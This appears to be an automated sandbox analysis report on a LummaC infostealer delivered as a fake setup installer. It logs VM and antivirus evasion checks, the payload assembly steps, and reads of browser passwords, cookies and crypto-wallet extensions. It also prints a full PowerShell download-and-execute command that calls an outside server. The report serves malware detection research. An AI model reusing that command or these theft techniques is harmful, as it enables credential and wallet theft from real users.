Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4276			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1543			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp

API coverage: 0.0 %

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com TID: 344	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7124	Thread sleep count: 4276 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4256	Thread sleep count: 1543 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1048	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1672	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2292	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\243714\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\243714	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000002.2875805433.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000010.00000002.2651215175.0000000007147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000002.2875805433.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\K]

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\!Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hawaii Hawaii.cmd & Hawaii.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 243714	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Applied	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "surround" Somehow	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Directors + ..\Tongue + ..\Banks + ..\Convenient + ..\Mainland + ..\Abilities + ..\Mainstream L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\243714\Publisher.com Publisher.com L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe "C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;			Jump to behavior

Source: extrac32.exe, 00000009.00000003.2068878931.0000000006AD8000.00000004.00000020.00020000.00000000.sdmp, Publisher.com, 0000000C.00000000.2072943978.0000000000783000.00000002.00000001.01000000.00000007.sdmp, Publisher.com.2.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWndU
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	Binary or memory string: Shell_TrayWnd
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	Binary or memory string: SHELL_TRAYWND
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SV
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	Binary or memory string: Shell_TrayWndU
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	Binary or memory string: PROGMAN
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	Binary or memory string: SHELL_TRAYWNDU

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: find.exe, 00000027.00000002.3285403007.0000026B9868B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000027.00000002.3285559347.0000026B98924000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: avgui.exe

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
